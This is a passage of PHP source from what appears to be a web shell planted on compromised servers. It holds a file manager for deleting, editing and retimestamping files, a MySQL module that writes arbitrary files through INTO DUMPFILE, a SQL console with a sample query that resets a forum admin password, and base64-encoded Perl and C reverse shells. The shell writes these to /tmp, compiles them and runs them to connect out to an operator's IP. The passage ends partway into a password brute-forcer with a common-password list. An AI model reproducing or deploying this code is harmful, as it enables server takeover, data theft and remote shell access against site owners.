582 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
583 // Get path
584 $dirdata = array();
585 $filedata = array();
586 if ($view_writable) {
587 $dirdata = GetList($nowpath);
588 } else {
589 // Open dir
590 $dirs = @opendir($dir);
591 while ($file = @readdir($dirs)) {
592 $filepath = $nowpath . $file;
593 if (@is_dir($filepath)) {
594 $dirdb['filename'] = $file;
595 $dirdb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
596 $dirdb['dirchmod'] = getChmod($filepath);
597 $dirdb['dirperm'] = getPerms($filepath);
598 $dirdb['fileowner'] = getUser($filepath);
599 $dirdb['dirlink'] = $nowpath;
600 $dirdb['server_link'] = $filepath;
601 $dirdb['client_link'] = ue($filepath);
602 $dirdata[] = $dirdb;
603 } else {
604 $filedb['filename'] = $file;
605 $filedb['size'] = sizecount(@filesize($filepath));
606 $filedb['mtime'] = @date('Y-m-d H:i:s', filemtime($filepath));
607 $filedb['filechmod'] = getChmod($filepath);
608 $filedb['fileperm'] = getPerms($filepath);
609 $filedb['fileowner'] = getUser($filepath);
610 $filedb['dirlink'] = $nowpath;
611 $filedb['server_link'] = $filepath;
612 $filedb['client_link'] = ue($filepath);
613 $filedata[] = $filedb;
614 }
615 } // while
616 unset($dirdb);
617 unset($filedb);
618 @closedir($dirs);
619 }
620 @sort($dirdata);
621 @sort($filedata);
622 $dir_i = '0';
623 foreach ($dirdata as $key => $dirdb) {
624 if ($dirdb['filename'] != '..' && $dirdb['filename'] != '.') {
625 $thisbg = bg();
626 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
627 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
628 p('<td><a href="javascript:godir(\'' . $dirdb['server_link'] . '\');">' . $dirdb['filename'] . '</a></td>');
629 p('<td nowrap>' . $dirdb['mtime'] . '</td>');
630 p('<td nowrap>--</td>');
631 p('<td nowrap>');
632 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirchmod'] . '</a> / ');
633 p('<a href="javascript:fileperm(\'' . $dirdb['server_link'] . '\');">' . $dirdb['dirperm'] . '</a>' . $dirdb['fileowner'] . '</td>');
634 p('<td nowrap><a href="javascript:dofile(\'deldir\',\'' . $dirdb['server_link'] . '\',\'Are you sure will delete ' . $dirdb['filename'] . '? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\'' . $dirdb['server_link'] . '\');">Rename</a></td>');
635 p('</tr>');
636 $dir_i++;
637 } else {
638 if ($dirdb['filename'] == '..') {
639 p('<tr class=fout>');
640 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\'' . getUpPath($nowpath) . '\');">Parent Directory</a></td>');
641 p('</tr>');
642 }
643 }
644 }
645 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
646 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
647 makehide('action', 'file');
648 makehide('thefile');
649 makehide('doing');
650 makehide('dir', $nowpath);
651 $file_i = '0';
652 foreach ($filedata as $key => $filedb) {
653 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
654 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
655 $thisbg = bg();
656 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
657 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
658 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
659 p('<td nowrap>' . $filedb['mtime'] . '</td>');
660 p('<td nowrap>' . $filedb['size'] . '</td>');
661 p('<td nowrap>');
662 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
663 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
664 p('<td nowrap>');
665 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
666 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
667 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
668 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
669 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
670 p('</td></tr>');
671 $file_i++;
672 }
673 }
674 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
675 p('</form></table>');
676 } // end dir
677 elseif ($action == 'sqlfile') {
678 if ($doing == "mysqlupload") {
679 $file = $_FILES['uploadfile'];
680 $filename = $file['tmp_name'];
681 if (file_exists($savepath)) {
682 m('The goal file has already existed');
683 } else {
684 if (!$filename) {
685 m('Please choose a file');
686 } else {
687 $fp = @fopen($filename, 'r');
688 $contents = @fread($fp, filesize($filename));
689 @fclose($fp);
690 $contents = bin2hex($contents);
691 if (!$upname) $upname = $file['name'];
692 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
693 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
694 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
695 }
696 }
697 }
698 ?>
699 <script type="text/javascript">
700 function mysqlfile(doing){
701 if(!doing) return;
702 $('doing').value=doing;
703 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
704 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
705 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
706 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
707 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
708 $('mysqlfile').charset.value=$('dbinfo').charset.value;
709 $('mysqlfile').submit();
710 }
711 </script>
712 <?php
713 !$dbhost && $dbhost = 'localhost';
714 !$dbuser && $dbuser = 'root';
715 !$dbport && $dbport = '3306';
716 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
717 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
718 makehide('action', 'sqlfile');
719 p('<p>');
720 p('DBHost:');
721 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
722 p(':');
723 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
724 p('DBUser:');
725 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
726 p('DBPass:');
727 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
728 p('DBName:');
729 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
730 p('DBCharset:');
731 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
732 p('</p>');
733 formfoot();
734 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
735 p('<h2>Upload file</h2>');
736 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
737 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
738 p('<h2>Download file</h2>');
739 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
740 makehide('dbhost');
741 makehide('dbport');
742 makehide('dbuser');
743 makehide('dbpass');
744 makehide('dbname');
745 makehide('charset');
746 makehide('doing');
747 makehide('action', 'sqlfile');
748 p('</form>');
749 } elseif ($action == 'sqladmin') {
750 !$dbhost && $dbhost = 'localhost';
751 !$dbuser && $dbuser = 'root';
752 !$dbport && $dbport = '3306';
753 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
754 if (isset($dbhost)) {
755 $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
756 }
757 if (isset($dbuser)) {
758 $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
759 }
760 if (isset($dbpass)) {
761 $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
762 }
763 if (isset($dbport)) {
764 $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
765 }
766 if (isset($dbname)) {
767 $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
768 }
769 if (isset($charset)) {
770 $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
771 }
772 if ($doing == 'backupmysql' && $saveasfile) {
773 if (!$table) {
774 m('Please choose the table');
775 } else {
776 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
777 $table = array_flip($table);
778 $fp = @fopen($path, 'w');
779 if ($fp) {
780 $result = q('SHOW tables');
781 if (!$result) p('<h2>' . mysql_error() . '</h2>');
782 $mysqldata = '';
783 while ($currow = mysql_fetch_array($result)) {
784 if (isset($table[$currow[0]])) {
785 sqldumptable($currow[0], $fp);
786 }
787 }
788 fclose($fp);
789 $fileurl = str_replace(SA_ROOT, '', $path);
790 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
791 mysql_close();
792 } else {
793 m('Backup failed');
794 }
795 }
796 }
797 if ($insert && $insertsql) {
798 $keystr = $valstr = $tmp = '';
799 foreach ($insertsql as $key => $val) {
800 if ($val) {
801 $keystr.= $tmp . $key;
802 $valstr.= $tmp . "'" . addslashes($val) . "'";
803 $tmp = ',';
804 }
805 }
806 if ($keystr && $valstr) {
807 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
808 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
809 }
810 }
811 if ($update && $insertsql && $base64) {
812 $valstr = $tmp = '';
813 foreach ($insertsql as $key => $val) {
814 $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
815 $tmp = ',';
816 }
817 if ($valstr) {
818 $where = base64_decode($base64);
819 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
820 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
821 }
822 }
823 if ($doing == 'del' && $base64) {
824 $where = base64_decode($base64);
825 $delete_sql = "DELETE FROM $tablename WHERE $where";
826 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
827 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
828 }
829 if ($tablename && $doing == 'drop') {
830 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
831 if (q("DROP TABLE $tablename")) {
832 m('Drop table of success');
833 $tablename = '';
834 } else {
835 m(mysql_error());
836 }
837 }
838 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
839 formhead(array('title' => 'MYSQL Manager'));
840 makehide('action', 'sqladmin');
841 p('<p>');
842 p('DBHost:');
843 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
844 p(':');
845 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
846 p('DBUser:');
847 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
848 p('DBPass:');
849 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
850 p('DBCharset:');
851 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
852 makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
853 p('</p>');
854 formfoot();
855 ?>
856 <script type="text/javascript">
857 function editrecord(action, base64, tablename){
858 if (action == 'del') {
859 if (!confirm('Is or isn\'t deletion record?')) return;
860 }
861 $('recordlist').doing.value=action;
862 $('recordlist').base64.value=base64;
863 $('recordlist').tablename.value=tablename;
864 $('recordlist').submit();
865 }
866 function moddbname(dbname) {
867 if(!dbname) return;
868 $('setdbname').dbname.value=dbname;
869 $('setdbname').submit();
870 }
871 function settable(tablename,doing,page) {
872 if(!tablename) return;
873 if (doing) {
874 $('settable').doing.value=doing;
875 }
876 if (page) {
877 $('settable').page.value=page;
878 }
879 $('settable').tablename.value=tablename;
880 $('settable').submit();
881 }
882 </script>
883 <?php
884 // SQL
885 formhead(array('name' => 'recordlist'));
886 makehide('doing');
887 makehide('action', 'sqladmin');
888 makehide('base64');
889 makehide('tablename');
890 p($dbform);
891 formfoot();
892 // Data
893 formhead(array('name' => 'setdbname'));
894 makehide('action', 'sqladmin');
895 p($dbform);
896 if (!$dbname) {
897 makehide('dbname');
898 }
899 formfoot();
900 formhead(array('name' => 'settable'));
901 makehide('action', 'sqladmin');
902 p($dbform);
903 makehide('tablename');
904 makehide('page', $page);
905 makehide('doing');
906 formfoot();
907 $cachetables = array();
908 $pagenum = 30;
909 $page = intval($page);
910 if ($page) {
911 $start_limit = ($page - 1) * $pagenum;
912 } else {
913 $start_limit = 0;
914 $page = 1;
915 }
916 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
917 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
918 // get mysql server
919 $mysqlver = mysql_get_server_info();
920 p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
921 $highver = $mysqlver > '4.1' ? 1 : 0;
922 // Show database
923 $query = q("SHOW DATABASES");
924 $dbs = array();
925 $dbs[] = '-- Select a database --';
926 while ($db = mysql_fetch_array($query)) {
927 $dbs[$db['Database']] = $db['Database'];
928 }
929 makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
930 $tabledb = array();
931 if ($dbname) {
932 p('<p>');
933 p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
934 if ($tablename) {
935 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
936 }
937 p('</p>');
938 mysql_select_db($dbname);
939 $getnumsql = '';
940 $runquery = 0;
941 if ($sql_query) {
942 $runquery = 1;
943 }
944 $allowedit = 0;
945 if ($tablename && !$sql_query) {
946 $sql_query = "SELECT * FROM $tablename";
947 $getnumsql = $sql_query;
948 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
949 $allowedit = 1;
950 }
951 p('<form action="' . $self . '" method="POST">');
952 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
953 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
954 makehide('tablename', $tablename);
955 makehide('action', 'sqladmin');
956 p($dbform);
957 p('</form>');
958 if ($tablename || ($runquery && $sql_query)) {
959 if ($doing == 'structure') {
960 $result = q("SHOW COLUMNS FROM $tablename");
961 $rowdb = array();
962 while ($row = mysql_fetch_array($result)) {
963 $rowdb[] = $row;
964 }
965 p('<table border="0" cellpadding="3" cellspacing="0">');
966 p('<tr class="head">');
967 p('<td>Field</td>');
968 p('<td>Type</td>');
969 p('<td>Null</td>');
970 p('<td>Key</td>');
971 p('<td>Default</td>');
972 p('<td>Extra</td>');
973 p('</tr>');
974 foreach ($rowdb as $row) {
975 $thisbg = bg();
976 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
977 p('<td>' . $row['Field'] . '</td>');
978 p('<td>' . $row['Type'] . '</td>');
979 p('<td>' . $row['Null'] . ' </td>');
980 p('<td>' . $row['Key'] . ' </td>');
981 p('<td>' . $row['Default'] . ' </td>');
982 p('<td>' . $row['Extra'] . ' </td>');
983 p('</tr>');
984 }
985 tbfoot();
986 } elseif ($doing == 'insert' || $doing == 'edit') {
987 $result = q('SHOW COLUMNS FROM ' . $tablename);
988 while ($row = mysql_fetch_array($result)) {
989 $rowdb[] = $row;
990 }
991 $rs = array();
992 if ($doing == 'insert') {
993 p('<h2>Insert new line in ' . $tablename . ' table »</h2>');
994 } else {
995 p('<h2>Update record in ' . $tablename . ' table »</h2>');
996 $where = base64_decode($base64);
997 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
998 $rs = mysql_fetch_array($result);
999 }
1000 p('<form method="post" action="' . $self . '">');
1001 p($dbform);
1002 makehide('action', 'sqladmin');
1003 makehide('tablename', $tablename);
1004 p('<table border="0" cellpadding="3" cellspacing="0">');
1005 foreach ($rowdb as $row) {
1006 if ($rs[$row['Field']]) {
1007 $value = htmlspecialchars($rs[$row['Field']]);
1008 } else {
1009 $value = '';
1010 }
1011 $thisbg = bg();
1012 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1013 p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1014 }
1015 if ($doing == 'insert') {
1016 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1017 } else {
1018 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1019 makehide('base64', $base64);
1020 }
1021 p('</table></form>');
1022 } else {
1023 $querys = @explode(';', $sql_query);
1024 foreach ($querys as $num => $query) {
1025 if ($query) {
1026 p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1027 switch (qy($query)) {
1028 case 0:
1029 p('<h2>Error : ' . mysql_error() . '</h2>');
1030 break;
1031 case 1:
1032 if (strtolower(substr($query, 0, 13)) == 'select * from') {
1033 $allowedit = 1;
1034 }
1035 if ($getnumsql) {
1036 $tatol = mysql_num_rows(q($getnumsql));
1037 $multipage = multi($tatol, $pagenum, $page, $tablename);
1038 }
1039 if (!$tablename) {
1040 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1041 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1042 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1043 $tablename = $matches[1][0];
1044 }
1045 $result = q($query);
1046 p($multipage);
1047 p('<table border="0" cellpadding="3" cellspacing="0">');
1048 p('<tr class="head">');
1049 if ($allowedit) p('<td>Action</td>');
1050 $fieldnum = @mysql_num_fields($result);
1051 for ($i = 0;$i < $fieldnum;$i++) {
1052 $name = @mysql_field_name($result, $i);
1053 $type = @mysql_field_type($result, $i);
1054 $len = @mysql_field_len($result, $i);
1055 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1056 }
1057 p('</tr>');
1058 while ($mn = @mysql_fetch_assoc($result)) {
1059 $thisbg = bg();
1060 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1061 $where = $tmp = $b1 = '';
1062 foreach ($mn as $key => $inside) {
1063 if ($inside) {
1064 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1065 $tmp = ' AND ';
1066 }
1067 $b1.= '<td nowrap>' . html_clean($inside) . ' </td>';
1068 }
1069 $where = base64_encode($where);
1070 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1071 p($b1);
1072 p('</tr>');
1073 unset($b1);
1074 }
1075 tbfoot();
1076 p($multipage);
1077 break;
1078 case 2:
1079 $ar = mysql_affected_rows();
1080 p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1081 break;
1082 }
1083 }
1084 }
1085 }
1086 } else {
1087 $query = q("SHOW TABLE STATUS");
1088 $table_num = $table_rows = $data_size = 0;
1089 $tabledb = array();
1090 while ($table = mysql_fetch_array($query)) {
1091 $data_size = $data_size + $table['Data_length'];
1092 $table_rows = $table_rows + $table['Rows'];
1093 $table['Data_length'] = sizecount($table['Data_length']);
1094 $table_num++;
1095 $tabledb[] = $table;
1096 }
1097 $data_size = sizecount($data_size);
1098 unset($table);
1099 p('<table border="0" cellpadding="0" cellspacing="0">');
1100 p('<form action="' . $self . '" method="POST">');
1101 makehide('action', 'sqladmin');
1102 p($dbform);
1103 p('<tr class="head">');
1104 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1105 p('<td>Name</td>');
1106 p('<td>Rows</td>');
1107 p('<td>Data_length</td>');
1108 p('<td>Create_time</td>');
1109 p('<td>Update_time</td>');
1110 if ($highver) {
1111 p('<td>Engine</td>');
1112 p('<td>Collation</td>');
1113 }
1114 p('</tr>');
1115 foreach ($tabledb as $key => $table) {
1116 $thisbg = bg();
1117 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1118 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1119 p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1120 p('<td>' . $table['Rows'] . '</td>');
1121 p('<td>' . $table['Data_length'] . '</td>');
1122 p('<td>' . $table['Create_time'] . '</td>');
1123 p('<td>' . $table['Update_time'] . '</td>');
1124 if ($highver) {
1125 p('<td>' . $table['Engine'] . '</td>');
1126 p('<td>' . $table['Collation'] . '</td>');
1127 }
1128 p('</tr>');
1129 }
1130 p('<tr class=fout>');
1131 p('<td> </td>');
1132 p('<td>Total tables: ' . $table_num . '</td>');
1133 p('<td>' . $table_rows . '</td>');
1134 p('<td>' . $data_size . '</td>');
1135 p('<td colspan="' . ($highver ? 4 : 2) . '"> </td>');
1136 p('</tr>');
1137 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1138 makehide('doing', 'backupmysql');
1139 formfoot();
1140 p("</table>");
1141 fr($query);
1142 }
1143 }
1144 }
1145 tbfoot();
1146 @mysql_close();
1147 } //end sql backup
1148 elseif ($action == 'backconnect') {
1149 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1150 !$yourport && $yourport = '12345';
1151 $usedb = array('perl' => 'perl', 'c' => 'c');
1152 $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1153 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1154 if ($start && $yourip && $yourport && $use) {
1155 if ($use == 'perl') {
1156 cf('/tmp/angel_bc', $back_connect);
1157 $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1158 } else {
1159 cf('/tmp/angel_bc.c', $back_connect_c);
1160 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1161 @unlink('/tmp/angel_bc.c');
1162 $res = execute("/tmp/angel_bc $yourip $yourport &");
1163 }
1164 m("Now script try connect to $yourip port $yourport ...");
1165 }
1166 formhead(array('title' => 'Back Connect'));
1167 makehide('action', 'backconnect');
1168 p('<p>');
1169 p('Your IP:');
1170 makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1171 p('Your Port:');
1172 makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1173 p('Use:');
1174 makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1175 makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1176 p('</p>');
1177 formfoot();
1178 } //end backconnect window via NC
1179 // Brute
1180 elseif ($action == 'brute') {
1181 formhead(array('title' => 'Brute Forcer'));
1182 makehide('action', 'brute');
1183 makehide('dir', $brute);
1184 @ini_set('memory_limit', 1000000000000);
1185 $connect_timeout = 5;
1186 @set_time_limit(0);
1187 $submit = $_REQUEST['submit'];
1188 $users = $_REQUEST['users'];
1189 $pass = $_REQUEST['passwords'];
1190 $target = $_REQUEST['target'];
1191 $option = $_REQUEST['option'];
1192 $passlist = "0123456
1193 01234567
1194 012345678
1195 0123456789
1196 01234567890
1197 123456
1198 1234567
1199 12345678
1200 123456789
1201 1234567890
1202 111111
1203 000000
1204 222222
1205 333333
1206 444444
1207 555555
1208 666666
1209 777777
1210 888888
1211 999999
1212 123123
1213 456456
1214 789789
1215 123321
1216 456654
1217 654321
1218 7654321
1219 87654321
1220 987654321
1221 0987654321
1222 admin
1223 administrator
1224 admincp
1225 cpanel
1226 adminx
1227 admins
1228 password
1229 passwords
1230 passw0rd
1231 p@ssw0rd
1232 p@ssword
1233 khongco
1234 25251325
1235 passw0rds";
1236 if ($target == '') {
1237 $target = 'localhost';
1238 }
1239 print " <div align='center'>
1240 <form method='post' style='border: 1px solid #000000'><br><br>
